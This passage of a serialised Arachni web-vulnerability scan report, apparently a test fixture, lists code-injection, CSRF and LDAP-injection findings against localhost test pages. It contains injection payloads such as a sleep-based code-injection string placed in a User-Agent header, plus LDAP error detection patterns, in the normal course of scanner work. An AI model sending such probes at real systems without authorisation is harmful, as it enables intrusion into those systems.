case, these issues will require further investigation\n even if they are
false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations: []
internal_modname: CodeInjectionTiming
internal_modname: CodeInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: User-Agent
url: http://localhost:14309/ruby/header/straight
elem: header
method: GET
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases where
the server takes\n an abnormally long time to respond.\n Either case, these
issues will require further investigation\n even if they are false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 11200.0
:timeout_divider: 1
:timing_string: ! ' && sleep(__TIME__/1000);'
:skip_orig: true
:injected_orig: ! ' && sleep(16000/1000);'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: ! ' && sleep(16000/1000);'
:injected: ! ' && sleep(16000/1000);'
:combo:
User-Agent: ! ' && sleep(16000/1000);'
:action: http://localhost:14309/ruby/header/straight
:silent: true
:regexp: ''
var: User-Agent
url: http://localhost:14309/ruby/header/straight
injected: ! ' && sleep(16000/1000);'
id:
regexp: ''
regexp_match:
elem: header
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: ! ' && sleep(16000/1000);'
Cookie: cookie=cookie+value
response: {}
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases
where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are
false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations: []
internal_modname: CodeInjectionTiming
internal_modname: CodeInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery
OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
CGI Security: http://www.cgisecurity.com/csrf-faq.html
var: insecure_important_form
url: http://localhost:9097/
elem: form
method: GET
name: Cross-Site Request Forgery
description: ! "The web application does not, or can not,\n sufficiently verify
whether a well-formed, valid, consistent\n request was intentionally provided
by the user who submitted the request.\n This is due to a lack of secure anti-CSRF
tokens to verify\n the freshness of the submitted data."
tags:
- csrf
- rdiff
- form
- token
cwe: '352'
cwe_url: http://cwe.mitre.org/data/definitions/352.html
severity: High
remedy_guidance: ! "A unique token that guaranties freshness of submitted\n data
must be added to all web application elements that can affect\n business logic."
mod_name: CSRF
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery
OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
CGI Security: http://www.cgisecurity.com/csrf-faq.html
opts:
:var: !binary |-
aW5zZWN1cmVfaW1wb3J0YW50X2Zvcm0=
:elem: form
:regexp: ''
var: insecure_important_form
url: http://localhost:9097/
injected:
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: GET
response: ! " \n \n\n
\ \n"
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: logged_in=true
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NDYz
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOTowMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Cross-Site Request Forgery
description: ! "The web application does not, or can not,\n sufficiently verify
whether a well-formed, valid, consistent\n request was intentionally provided
by the user who submitted the request.\n This is due to a lack of secure
anti-CSRF tokens to verify\n the freshness of the submitted data."
tags:
- csrf
- rdiff
- form
- token
cwe: '352'
cwe_url: http://cwe.mitre.org/data/definitions/352.html
severity: High
remedy_guidance: ! "A unique token that guaranties freshness of submitted\n data
must be added to all web application elements that can affect\n business
logic."
mod_name: CSRF
variations: []
internal_modname: CSRF
internal_modname: CSRF
- !ruby/object:Arachni::Issue
verification: false
references:
Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery
OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
CGI Security: http://www.cgisecurity.com/csrf-faq.html
var: insecure_important_form
url: http://localhost:9097/token_in_name
elem: form
method: GET
name: Cross-Site Request Forgery
description: ! "The web application does not, or can not,\n sufficiently verify
whether a well-formed, valid, consistent\n request was intentionally provided
by the user who submitted the request.\n This is due to a lack of secure anti-CSRF
tokens to verify\n the freshness of the submitted data."
tags:
- csrf
- rdiff
- form
- token
cwe: '352'
cwe_url: http://cwe.mitre.org/data/definitions/352.html
severity: High
remedy_guidance: ! "A unique token that guaranties freshness of submitted\n data
must be added to all web application elements that can affect\n business logic."
mod_name: CSRF
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery
OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
CGI Security: http://www.cgisecurity.com/csrf-faq.html
opts:
:var: !binary |-
aW5zZWN1cmVfaW1wb3J0YW50X2Zvcm0=
:elem: form
:regexp: ''
var: insecure_important_form
url: http://localhost:9097/token_in_name
injected:
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: GET
response: ! " \n \n\n
\ \n\n"
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: logged_in=true
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NDQy
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOTowNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Cross-Site Request Forgery
description: ! "The web application does not, or can not,\n sufficiently verify
whether a well-formed, valid, consistent\n request was intentionally provided
by the user who submitted the request.\n This is due to a lack of secure
anti-CSRF tokens to verify\n the freshness of the submitted data."
tags:
- csrf
- rdiff
- form
- token
cwe: '352'
cwe_url: http://cwe.mitre.org/data/definitions/352.html
severity: High
remedy_guidance: ! "A unique token that guaranties freshness of submitted\n data
must be added to all web application elements that can affect\n business
logic."
mod_name: CSRF
variations: []
internal_modname: CSRF
internal_modname: CSRF
- !ruby/object:Arachni::Issue
verification: false
references:
Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery
OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
CGI Security: http://www.cgisecurity.com/csrf-faq.html
var: insecure_important_form
url: http://localhost:9097/token_in_action
elem: form
method: GET
name: Cross-Site Request Forgery
description: ! "The web application does not, or can not,\n sufficiently verify
whether a well-formed, valid, consistent\n request was intentionally provided
by the user who submitted the request.\n This is due to a lack of secure anti-CSRF
tokens to verify\n the freshness of the submitted data."
tags:
- csrf
- rdiff
- form
- token
cwe: '352'
cwe_url: http://cwe.mitre.org/data/definitions/352.html
severity: High
remedy_guidance: ! "A unique token that guaranties freshness of submitted\n data
must be added to all web application elements that can affect\n business logic."
mod_name: CSRF
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery
OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
CGI Security: http://www.cgisecurity.com/csrf-faq.html
opts:
:var: !binary |-
aW5zZWN1cmVfaW1wb3J0YW50X2Zvcm0=
:elem: form
:regexp: ''
var: insecure_important_form
url: http://localhost:9097/token_in_action
injected:
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: GET
response: ! " \n \n\n
\ \n\n
\ \n\n
\ \n\n"
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: logged_in=true
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NzY2
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOTowNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Cross-Site Request Forgery
description: ! "The web application does not, or can not,\n sufficiently verify
whether a well-formed, valid, consistent\n request was intentionally provided
by the user who submitted the request.\n This is due to a lack of secure
anti-CSRF tokens to verify\n the freshness of the submitted data."
tags:
- csrf
- rdiff
- form
- token
cwe: '352'
cwe_url: http://cwe.mitre.org/data/definitions/352.html
severity: High
remedy_guidance: ! "A unique token that guaranties freshness of submitted\n data
must be added to all web application elements that can affect\n business
logic."
mod_name: CSRF
variations: []
internal_modname: CSRF
internal_modname: CSRF
- !ruby/object:Arachni::Issue
verification: false
references:
Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery
OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
CGI Security: http://www.cgisecurity.com/csrf-faq.html
var: insecure_important_form
url: http://localhost:9097/with_nonce
elem: form
method: GET
name: Cross-Site Request Forgery
description: ! "The web application does not, or can not,\n sufficiently verify
whether a well-formed, valid, consistent\n request was intentionally provided
by the user who submitted the request.\n This is due to a lack of secure anti-CSRF
tokens to verify\n the freshness of the submitted data."
tags:
- csrf
- rdiff
- form
- token
cwe: '352'
cwe_url: http://cwe.mitre.org/data/definitions/352.html
severity: High
remedy_guidance: ! "A unique token that guaranties freshness of submitted\n data
must be added to all web application elements that can affect\n business logic."
mod_name: CSRF
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery
OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
CGI Security: http://www.cgisecurity.com/csrf-faq.html
opts:
:var: !binary |-
aW5zZWN1cmVfaW1wb3J0YW50X2Zvcm0=
:elem: form
:regexp: ''
var: insecure_important_form
url: http://localhost:9097/with_nonce
injected:
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: GET
response: ! " \n \n\n
\ \n"
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: logged_in=true
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NDIx
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOTowNSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Cross-Site Request Forgery
description: ! "The web application does not, or can not,\n sufficiently verify
whether a well-formed, valid, consistent\n request was intentionally provided
by the user who submitted the request.\n This is due to a lack of secure
anti-CSRF tokens to verify\n the freshness of the submitted data."
tags:
- csrf
- rdiff
- form
- token
cwe: '352'
cwe_url: http://cwe.mitre.org/data/definitions/352.html
severity: High
remedy_guidance: ! "A unique token that guaranties freshness of submitted\n data
must be added to all web application elements that can affect\n business
logic."
mod_name: CSRF
variations: []
internal_modname: CSRF
internal_modname: CSRF
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection
OWASP: http://www.owasp.org/index.php/LDAP_injection
var: input
url: http://localhost:13347/form/append
elem: form
method: GET
name: LDAP Injection
description: ! "LDAP queries can be injected into the web application\n which
can be used to disclose sensitive data of affect the execution flow."
tags:
- ldap
- injection
- regexp
cwe: '90'
cwe_url: http://cwe.mitre.org/data/definitions/90.html
severity: High
cvssv2: ''
remedy_guidance: ! "User inputs must be validated and filtered\n before being
used in an LDAP query."
remedy_code: ''
mod_name: LDAPInjection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection
OWASP: http://www.owasp.org/index.php/LDAP_injection
opts:
:redundant: false
:async: true
:regexp: !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
:match: !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
:substring:
- !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
- !binary |-
amF2YXgubmFtaW5nLk5hbWVOb3RGb3VuZEV4Y2VwdGlvbg==
- !binary |-
TERBUEV4Y2VwdGlvbg==
- !binary |-
Y29tLnN1bi5qbmRpLmxkYXA=
- !binary |-
U2VhcmNoOiBCYWQgc2VhcmNoIGZpbHRlcg==
- !binary |-
UHJvdG9jb2wgZXJyb3Igb2NjdXJyZWQ=
- !binary |-
U2l6ZSBsaW1pdCBoYXMgZXhjZWVkZWQ=
- !binary |-
QW4gaW5hcHByb3ByaWF0ZSBtYXRjaGluZyBvY2N1cnJlZA==
- !binary |-
QSBjb25zdHJhaW50IHZpb2xhdGlvbiBvY2N1cnJlZA==
- !binary |-
VGhlIHN5bnRheCBpcyBpbnZhbGlk
- !binary |-
T2JqZWN0IGRvZXMgbm90IGV4aXN0
- !binary |-
VGhlIGFsaWFzIGlzIGludmFsaWQ=
- !binary |-
VGhlIGRpc3Rpbmd1aXNoZWQgbmFtZSBoYXMgYW4gaW52YWxpZCBzeW50YXg=
- !binary |-
VGhlIHNlcnZlciBkb2VzIG5vdCBoYW5kbGUgZGlyZWN0b3J5IHJlcXVlc3Rz
- !binary |-
VGhlcmUgd2FzIGEgbmFtaW5nIHZpb2xhdGlvbg==
- !binary |-
VGhlcmUgd2FzIGFuIG9iamVjdCBjbGFzcyB2aW9sYXRpb24=
- !binary |-
UmVzdWx0cyByZXR1cm5lZCBhcmUgdG9vIGxhcmdl
- !binary |-
VW5rbm93biBlcnJvciBvY2N1cnJlZA==
- !binary |-
TG9jYWwgZXJyb3Igb2NjdXJyZWQ=
- !binary |-
VGhlIHNlYXJjaCBmaWx0ZXIgaXMgaW5jb3JyZWN0
- !binary |-
VGhlIHNlYXJjaCBmaWx0ZXIgaXMgaW52YWxpZA==
- !binary |-
VGhlIHNlYXJjaCBmaWx0ZXIgY2Fubm90IGJlIHJlY29nbml6ZWQ=
- !binary |-
SW52YWxpZCBETiBzeW50YXg=
- !binary |-
Tm8gU3VjaCBPYmplY3Q=
- !binary |-
SVBXb3Jrc0FTUC5MREFQ
- !binary |-
TW9kdWxlIFByb2R1Y3RzLkxEQVBNdWx0aVBsdWdpbnM=
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '#^($!@$)(()))******'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": default#^($!@$)(()))******
:follow_location: true
:injected: default#^($!@$)(()))******
:combo:
!binary "aW5wdXQ=": default#^($!@$)(()))******
:action: http://localhost:13347/form/append
:verification: false
:id: !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
var: input
url: http://localhost:13347/form/append
injected: default#^($!@$)(()))******
id: supplied argument is not a valid ldap
regexp: supplied argument is not a valid ldap
regexp_match: supplied argument is not a valid ldap
elem: form
remarks: {}
method: GET
response: ! 'supplied argument is not a valid ldap
javax.naming.NameNotFoundException
LDAPException
com.sun.jndi.ldap
Search: Bad search filter
Protocol error occurred
Size limit has exceeded
An inappropriate matching occurred
A constraint violation occurred
The syntax is invalid
Object does not exist
The alias is invalid
The distinguished name has an invalid syntax
The server does not handle directory requests
There was a naming violation
There was an object class violation
Results returned are too large
Unknown error occurred
Local error occurred
The search filter is incorrect
The search filter is invalid
The search filter cannot be recognized
Invalid DN syntax
No Such Object
IPWorksASP.LDAP
Module Products.LDAPMultiPlugins
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NzIz
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOTowNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: LDAP Injection
description: ! "LDAP queries can be injected into the web application\n which
can be used to disclose sensitive data of affect the execution flow."
tags:
- ldap
- injection
- regexp
cwe: '90'
cwe_url: http://cwe.mitre.org/data/definitions/90.html
severity: High
cvssv2: ''
remedy_guidance: ! "User inputs must be validated and filtered\n before being
used in an LDAP query."
remedy_code: ''
mod_name: LDAPInjection
variations: []
internal_modname: LDAPInjection
internal_modname: LDAPInjection
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection
OWASP: http://www.owasp.org/index.php/LDAP_injection
var: input
url: http://localhost:13347/link/append?input=default
elem: link
method: GET
name: LDAP Injection
description: ! "LDAP queries can be injected into the web application\n which
can be used to disclose sensitive data of affect the execution flow."
tags:
- ldap
- injection
- regexp
cwe: '90'
cwe_url: http://cwe.mitre.org/data/definitions/90.html
severity: High
cvssv2: ''
remedy_guidance: ! "User inputs must be validated and filtered\n before being
used in an LDAP query."
remedy_code: ''
mod_name: LDAPInjection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection
OWASP: http://www.owasp.org/index.php/LDAP_injection
opts:
:redundant: false
:async: true
:regexp: !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
:match: !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
:substring:
- !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
- !binary |-
amF2YXgubmFtaW5nLk5hbWVOb3RGb3VuZEV4Y2VwdGlvbg==
- !binary |-
TERBUEV4Y2VwdGlvbg==
- !binary |-
Y29tLnN1bi5qbmRpLmxkYXA=
- !binary |-
U2VhcmNoOiBCYWQgc2VhcmNoIGZpbHRlcg==
- !binary |-
UHJvdG9jb2wgZXJyb3Igb2NjdXJyZWQ=
- !binary |-
U2l6ZSBsaW1pdCBoYXMgZXhjZWVkZWQ=
- !binary |-
QW4gaW5hcHByb3ByaWF0ZSBtYXRjaGluZyBvY2N1cnJlZA==
- !binary |-
QSBjb25zdHJhaW50IHZpb2xhdGlvbiBvY2N1cnJlZA==
- !binary |-
VGhlIHN5bnRheCBpcyBpbnZhbGlk
- !binary |-
T2JqZWN0IGRvZXMgbm90IGV4aXN0
- !binary |-
VGhlIGFsaWFzIGlzIGludmFsaWQ=
- !binary |-
VGhlIGRpc3Rpbmd1aXNoZWQgbmFtZSBoYXMgYW4gaW52YWxpZCBzeW50YXg=
- !binary |-
VGhlIHNlcnZlciBkb2VzIG5vdCBoYW5kbGUgZGlyZWN0b3J5IHJlcXVlc3Rz
- !binary |-
VGhlcmUgd2FzIGEgbmFtaW5nIHZpb2xhdGlvbg==
- !binary |-
VGhlcmUgd2FzIGFuIG9iamVjdCBjbGFzcyB2aW9sYXRpb24=
- !binary |-
UmVzdWx0cyByZXR1cm5lZCBhcmUgdG9vIGxhcmdl
- !binary |-
VW5rbm93biBlcnJvciBvY2N1cnJlZA==
- !binary |-
TG9jYWwgZXJyb3Igb2NjdXJyZWQ=
- !binary |-
VGhlIHNlYXJjaCBmaWx0ZXIgaXMgaW5jb3JyZWN0
- !binary |-
VGhlIHNlYXJjaCBmaWx0ZXIgaXMgaW52YWxpZA==
- !binary |-
VGhlIHNlYXJjaCBmaWx0ZXIgY2Fubm90IGJlIHJlY29nbml6ZWQ=
- !binary |-
SW52YWxpZCBETiBzeW50YXg=
- !binary |-
Tm8gU3VjaCBPYmplY3Q=
- !binary |-
SVBXb3Jrc0FTUC5MREFQ
- !binary |-
TW9kdWxlIFByb2R1Y3RzLkxEQVBNdWx0aVBsdWdpbnM=
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '#^($!@$)(()))******'
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": default#^($!@$)(()))******
:follow_location: true
:injected: default#^($!@$)(()))******
:combo:
!binary "aW5wdXQ=": default#^($!@$)(()))******
:action: http://localhost:13347/link/append?input=default
:verification: false
:id: !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
var: input
url: http://localhost:13347/link/append?input=default
injected: default#^($!@$)(()))******
id: supplied argument is not a valid ldap
regexp: supplied argument is not a valid ldap
regexp_match: supplied argument is not a valid ldap
elem: link
remarks: {}
method: GET
response: ! 'supplied argument is not a valid ldap
javax.naming.NameNotFoundException
LDAPException
com.sun.jndi.ldap
Search: Bad search filter
Protocol error occurred
Size limit has exceeded
An inappropriate matching occurred
A constraint violation occurred
The syntax is invalid
Object does not exist
The alias is invalid
The distinguished name has an invalid syntax
The server does not handle directory requests
There was a naming violation
There was an object class violation
Results returned are too large
Unknown error occurred
Local error occurred
The search filter is incorrect
The search filter is invalid
The search filter cannot be recognized
Invalid DN syntax
No Such Object
IPWorksASP.LDAP
Module Products.LDAPMultiPlugins
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NzIz
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOTowOCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: LDAP Injection
description: ! "LDAP queries can be injected into the web application\n which
can be used to disclose sensitive data of affect the execution flow."
tags:
- ldap
- injection
- regexp
cwe: '90'
cwe_url: http://cwe.mitre.org/data/definitions/90.html
severity: High
cvssv2: ''
remedy_guidance: ! "User inputs must be validated and filtered\n before being
used in an LDAP query."
remedy_code: ''
mod_name: LDAPInjection
variations: []
internal_modname: LDAPInjection
internal_modname: LDAPInjection
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection
OWASP: http://www.owasp.org/index.php/LDAP_injection
var: cookie2
url: http://localhost:13347/cookie/append
elem: cookie
method: GET
name: LDAP Injection
description: ! "LDAP queries can be injected into the web application\n which
can be used to disclose sensitive data of affect the execution flow."
tags:
- ldap
- injection
- regexp
cwe: '90'
cwe_url: http://cwe.mitre.org/data/definitions/90.html
severity: High
cvssv2: ''
remedy_guidance: ! "User inputs must be validated and filtered\n before being
used in an LDAP query."
remedy_code: ''
mod_name: LDAPInjection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection
OWASP: http://www.owasp.org/index.php/LDAP_injection
opts:
:redundant: false
:async: true
:regexp: !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
:match: !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
:substring:
- !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
- !binary |-
amF2YXgubmFtaW5nLk5hbWVOb3RGb3VuZEV4Y2VwdGlvbg==
- !binary |-
TERBUEV4Y2VwdGlvbg==
- !binary |-
Y29tLnN1bi5qbmRpLmxkYXA=
- !binary |-
U2VhcmNoOiBCYWQgc2VhcmNoIGZpbHRlcg==
- !binary |-
UHJvdG9jb2wgZXJyb3Igb2NjdXJyZWQ=
- !binary |-
U2l6ZSBsaW1pdCBoYXMgZXhjZWVkZWQ=
- !binary |-
QW4gaW5hcHByb3ByaWF0ZSBtYXRjaGluZyBvY2N1cnJlZA==
- !binary |-
QSBjb25zdHJhaW50IHZpb2xhdGlvbiBvY2N1cnJlZA==
- !binary |-
VGhlIHN5bnRheCBpcyBpbnZhbGlk
- !binary |-
T2JqZWN0IGRvZXMgbm90IGV4aXN0
- !binary |-
VGhlIGFsaWFzIGlzIGludmFsaWQ=
- !binary |-
VGhlIGRpc3Rpbmd1aXNoZWQgbmFtZSBoYXMgYW4gaW52YWxpZCBzeW50YXg=
- !binary |-
VGhlIHNlcnZlciBkb2VzIG5vdCBoYW5kbGUgZGlyZWN0b3J5IHJlcXVlc3Rz
- !binary |-
VGhlcmUgd2FzIGEgbmFtaW5nIHZpb2xhdGlvbg==
- !binary |-
VGhlcmUgd2FzIGFuIG9iamVjdCBjbGFzcyB2aW9sYXRpb24=
- !binary |-
UmVzdWx0cyByZXR1cm5lZCBhcmUgdG9vIGxhcmdl
- !binary |-
VW5rbm93biBlcnJvciBvY2N1cnJlZA==
- !binary |-
TG9jYWwgZXJyb3Igb2NjdXJyZWQ=
- !binary |-
